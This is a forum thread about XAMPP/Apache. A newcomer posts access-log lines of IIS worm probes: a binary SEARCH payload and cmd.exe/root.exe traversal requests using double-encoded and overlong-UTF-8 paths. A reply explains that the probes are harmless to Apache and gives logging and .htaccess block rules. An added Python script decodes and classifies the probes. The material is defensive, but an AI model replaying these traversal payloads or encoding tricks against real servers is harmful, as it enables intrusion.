Apache access.log

Problems with the Windows version of XAMPP, questions, comments, and anything related.

Postby motordude » 30. December 2004 08:47

I am not sure if this is the place to post this but I'll try it. I am rather new to setting up a webserver and am still exploring. I was looking at my Apache access log and found something I am not sure what it means.

Here is a part of the log, sorry for the length


68.77.21.52 - - [29/Dec/2004:19:29:03 -0500] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02 ... " 414 309
68.77.132.153 - - [29/Dec/2004:20:01:37 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:38 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:38 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:39 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:39 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:40 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:40 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:41 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:41 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:42 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
68.77.132.153 - - [29/Dec/2004:20:01:43 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:43 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:44 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
68.77.132.153 - - [29/Dec/2004:20:01:44 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
68.77.132.153 - - [29/Dec/2004:20:01:44 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:44 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:45 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:45 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:46 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:49 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:50 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:50 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:51 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:51 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:52 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:52 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
68.77.132.153 - - [29/Dec/2004:21:36:53 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:53 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:53 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
68.77.132.153 - - [29/Dec/2004:21:36:54 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
68.77.132.153 - - [29/Dec/2004:21:36:54 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:21:36:55 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454

What is that search? And what is the "GET /scripts" portion as well? I am restricting access using .htaccess; other than that I don't have anything else on the site yet. Thanks in advance
motordude
 
Posts: 1
Joined: 30. December 2004 08:45

Postby Maller » 30. December 2004 10:03

I believe this is IIS worms, which doesn't affect the Apache web server but just fills up your log files...!
There are several ways of getting these notices out of your logs, e.g. using mod_log_config:
Code:
<IfModule mod_log_config.c>
  # tag requests for the usual IIS worm/scanner targets; they are written to trash_log below
  SetEnvIf Request_URI "cmd\.exe" trash
  SetEnvIf Request_URI "root\.exe" trash
  SetEnvIf Request_URI "shell\.exe" trash
  SetEnvIf Request_URI "default\.ida" trash
  SetEnvIf Request_URI "wpad\.dat" trash

  LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"" combined
  CustomLog logs/access_log combined env=!trash
  CustomLog logs/trash_log combined env=trash

  <IfModule mod_deflate.c>
    DeflateFilterNote Input instream
    DeflateFilterNote Output outstream
    DeflateFilterNote Ratio ratio
    LogFormat '"%r" %{outstream}n/%{instream}n (%{ratio}n%%)' deflate
    CustomLog logs/deflate_log deflate env=!trash
  </IfModule>
</IfModule>

You could also make a .htaccess file with the following text in it.
Code:
<IfModule mod_rewrite.c>
    RewriteEngine On
    # RewriteLog / RewriteLogLevel are only allowed in the server config or a
    # <VirtualHost>, not in .htaccess (Apache answers 500 otherwise); set them there.
    # RewriteLog c:/apache2/logs/apdtech_rewrite.log
    # RewriteLogLevel 0

    # block user agents
    RewriteCond %{HTTP_USER_AGENT} ^.*MSFrontpage.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Frontpage.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Backweb.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Bandit.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Ants.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Buddy.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*zip.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Crawler.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Wget.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Grabber.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Sucker.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Downloader.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Siphon.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Collector.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Snagger.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Widow.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Snake.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Vacuum.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Pump.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Teleport.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Reaper.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Mag-Net.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Memo.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*pcBrowser.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*leech.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Stripper.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Offline.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Copier.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Mirror.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*mister.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*HMView.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*HTTrack.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*JOC.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*likse.*$ [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*Recorder.*$
    # in a per-directory (.htaccess) context the matched path has no leading slash,
    # so ^/.+ would never match; ^.*$ matches every request
    RewriteRule ^.*$ - [F]

    # block viruses and script kiddies (410 Gone)
    RewriteCond %{THE_REQUEST} default.ida
    RewriteRule ^.*$ - [G,L]

    RewriteCond %{THE_REQUEST} cmd.exe
    RewriteRule ^.*$ - [G,L]

    RewriteCond %{THE_REQUEST} root.exe
    RewriteRule ^.*$ - [G,L]

    # note: this also blocks any legitimate path under /scripts/ on your own site
    RewriteCond %{THE_REQUEST} /scripts/
    RewriteRule ^.*$ - [G,L]

    RewriteCond %{THE_REQUEST} _vti_
    RewriteRule ^.*$ - [G,L]

    RewriteCond %{THE_REQUEST} shell.exe
    RewriteRule ^.*$ - [G,L]

    RewriteCond %{THE_REQUEST} nsiislog.dll
    RewriteRule ^.*$ - [G,L]

    RewriteCond %{THE_REQUEST} msadcs.dll
    RewriteRule ^.*$ - [G,L]

</IfModule>
Maller
 
Posts: 49
Joined: 06. March 2004 14:47
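To make motordude's log lines readable and to see exactly what Maller's filters catch, here is an added Python script; it is not from the thread and not part of XAMPP or Apache. It parses common-log-format lines, decodes the double-encoded (`%255c`, `%25%35%63`) and overlong-UTF-8 (`%c0%af`, `%c1%1c`) path segments back to the `..\..` traversal they stand for, flags the `SEARCH` request whose URL Apache logged as escaped `\xNN` bytes, and then applies the same `SetEnvIf` and `RewriteCond %{THE_REQUEST}` patterns from the two snippets above. `SAMPLE_LOG` is constructed: the worm lines copy request shapes from the first post (the `SEARCH` payload is shortened and given an HTTP version), and the `10.0.0.5` lines are made up to stand in for ordinary visitors. The 401/404/400 statuses show Apache served none of these; the `collateral` list shows the `/scripts/` rewrite condition would also block a site's own `/scripts/` files.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample in Apache common log format. The first five lines copy the
# request shapes from motordude's post (SEARCH payload shortened); the two
# 10.0.0.5 lines are made up to stand in for ordinary visitors.
SAMPLE_LOG = r'''68.77.21.52 - - [29/Dec/2004:19:29:03 -0500] "SEARCH /\x90\x02\xb1\x02\xb1 HTTP/1.1" 414 309
68.77.132.153 - - [29/Dec/2004:20:01:37 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:39 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:43 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
68.77.132.153 - - [29/Dec/2004:20:01:44 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 454
10.0.0.5 - - [29/Dec/2004:20:05:00 -0500] "GET /index.html HTTP/1.1" 200 1043
10.0.0.5 - - [29/Dec/2004:20:05:01 -0500] "GET /scripts/menu.js HTTP/1.1" 200 512
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>HTTP/[\d.]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)')
# mod_log_config writes non-printable request bytes as \xNN, so a literal
# backslash-x-hex in the %r field means binary data was sent in the URL.
ESCAPED_BYTE = re.compile(r'\\x[0-9a-f]{2}')
WORM_BINARIES = ('cmd.exe', 'root.exe')
# SetEnvIf patterns from Maller's first snippet (matched against Request_URI).
TRASH_PATTERNS = [re.compile(p) for p in
                  (r'cmd\.exe', r'root\.exe', r'shell\.exe', r'default\.ida', r'wpad\.dat')]
# RewriteCond %{THE_REQUEST} patterns from the .htaccess snippet (user-agent rules left out).
REWRITE_CONDS = [re.compile(p) for p in
                 ('default.ida', 'cmd.exe', 'root.exe', '/scripts/', '_vti_',
                  'shell.exe', 'nsiislog.dll', 'msadcs.dll')]


def parse_line(line):
    """Split one common-log-format line into fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def canonicalize(target, max_rounds=3):
    """Percent-decode repeatedly (double encoding such as %255c needs two passes)
    and fold overlong two-byte UTF-8 (0xC0/0xC1 lead byte) back to the ASCII
    character it smuggles, as a lenient decoder does with %c0%af or %c1%1c."""
    path = target.split('?', 1)[0]
    for _ in range(max_rounds):
        raw = unquote_to_bytes(path)
        out = bytearray()
        i = 0
        while i < len(raw):
            if raw[i] in (0xC0, 0xC1) and i + 1 < len(raw):
                # the value fits in 7 bits, so this "two-byte character" is plain ASCII
                out.append(((raw[i] & 0x1F) << 6) | (raw[i + 1] & 0x3F))
                i += 2
            else:
                out.append(raw[i])
                i += 1
        decoded = out.decode('latin-1')
        if decoded == path:
            break
        path = decoded
    return path


def classify(entry):
    """Label an entry: binary-payload, iis-worm-probe, traversal or normal."""
    if ESCAPED_BYTE.search(entry['target']):
        return 'binary-payload'
    canon = canonicalize(entry['target']).lower()
    if canon.endswith(WORM_BINARIES):
        return 'iis-worm-probe'
    if re.search(r'\.\.[\\/]', canon):
        return 'traversal'
    return 'normal'


def maller_trash(request_uri):
    """True if Maller's SetEnvIf lines would divert this request to trash_log."""
    return any(p.search(request_uri) for p in TRASH_PATTERNS)


def maller_rewrite_blocks(request_line):
    """True if the .htaccess RewriteCond lines would answer this request with 410."""
    return any(p.search(request_line) for p in REWRITE_CONDS)


def triage(log_text):
    """Per-source counts, probes that got a 2xx, and normal requests the rewrite rules would block."""
    by_ip = defaultdict(Counter)
    served, collateral = [], []
    for line in log_text.splitlines():
        e = parse_line(line)
        if e is None:
            continue
        kind = classify(e)
        by_ip[e['ip']][kind] += 1
        request_line = f"{e['method']} {e['target']} {e['proto'] or ''}".strip()
        if kind != 'normal' and e['status'].startswith('2'):
            served.append(line)
        if kind == 'normal' and maller_rewrite_blocks(request_line):
            collateral.append(e['target'])
    return {'by_ip': {ip: dict(c) for ip, c in by_ip.items()},
            'served': served, 'collateral': collateral}


if __name__ == '__main__':
    report = triage(SAMPLE_LOG)
    for ip, kinds in report['by_ip'].items():
        print(ip, kinds)
    print('probes answered with 2xx:', report['served'])
    print('ordinary paths the .htaccess rules would also block:', report['collateral'])
```

Run against a real access.log, `triage` gives a quick check of the two things that matter here: whether any flagged request received a 2xx (on this sample none did, which matches Maller's point that these probes are aimed at IIS), and which of your own paths a blunt pattern like `/scripts/` would take down with them. `maller_trash` works on the still-encoded URI, which is why the `SetEnvIf` approach keeps the lines out of `access_log` without needing to decode anything.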

